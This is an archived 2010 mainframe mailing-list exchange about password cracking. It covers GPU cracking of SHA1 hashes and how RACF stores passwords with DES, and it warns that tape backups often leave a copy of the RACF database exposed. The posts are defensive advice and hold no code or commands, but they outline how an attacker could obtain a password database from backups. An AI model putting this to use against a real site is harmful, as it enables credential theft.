Re: A New Threat for password hacking

Sun, 28 Nov 2010 13:59:41 -0800 

Easy to say "do not share your RACF db"; harder in reality. Most sites
believe they are safe because their RACF db is security protected and the
dasd is not shared. And then completely forget that backups (to physical or
virtual tape) contain the exact same information. And quite often the DSN
used for the backup tapes is some type of dasd-manager HLQ, since it was
most likely a full-volume backup that happen'ed to contain the RACF db. And
even if the HLQ for the full-volume backups is read-protected; it is still
far easier to hack a tape dataset. Often, tape libraries (physical and
virtual) are shared with less-secure test machines and quite often even with
non z/OS systems. Granted, you will need the physical layout of the RACF db;
but not the entire layout. Just enough to identify where the passphrases are
maintained.

The number of sites that forget about tape security is scary. And
unprotected tape (both physical and virtual) allows anyone in the
organization to read a backup of almost any file in the data center.

Russell Witt
my own 2-cents worth

-----Original Message-----
From: IBM Mainframe Discussion List [mailto:[email protected]]on
Behalf Of R.S.
Sent: Sunday, November 28, 2010 1:52 AM
To: [email protected]
Subject: Re: A New Threat for password hacking


Ed Gould pisze:
> http://preview.tinyurl.com/2djttta
> Hacker Cracks Secure Hashing Algorithm Using Amazon CloudUsing EC2's
cluster GPU power, security researcher spent only $2.10 to decrypt 14 SHA1
passwords in under an hour; other experts aren't concerned.

Fortunately mainframe has no GPU <vbg>
more seriously:
1. Passwords in RACF db are stored using DES, not SHA (actually the
password is the key used to encrypt the userid).
2. It's wide known that SHA1 is not enough strong.
3. The best idea is not to share RACF db with potential hackers. No db
means nothing to crack, doesn't matter neither algorithm, nor CPU power
available for cracking.

--
Radoslaw Skorupka
Lodz, Poland


--
BRE Bank SA
ul. Senatorska 18
00-950 Warszawa
www.brebank.pl

Sd Rejonowy dla m. st. Warszawy
XII Wydzia Gospodarczy Krajowego Rejestru Sdowego,
nr rejestru przedsibiorców KRS 0000025237
NIP: 526-021-50-88
Wedug stanu na dzie 16.07.2010 r. kapita zakadowy BRE Banku SA (w
caoci wpacony) wynosi 168.248.328 zotych.

----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to [email protected] with the message: GET IBM-MAIN INFO
Search the archives at http://bama.ua.edu/archives/ibm-main.html

----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to [email protected] with the message: GET IBM-MAIN INFO
Search the archives at http://bama.ua.edu/archives/ibm-main.html

Reply via email to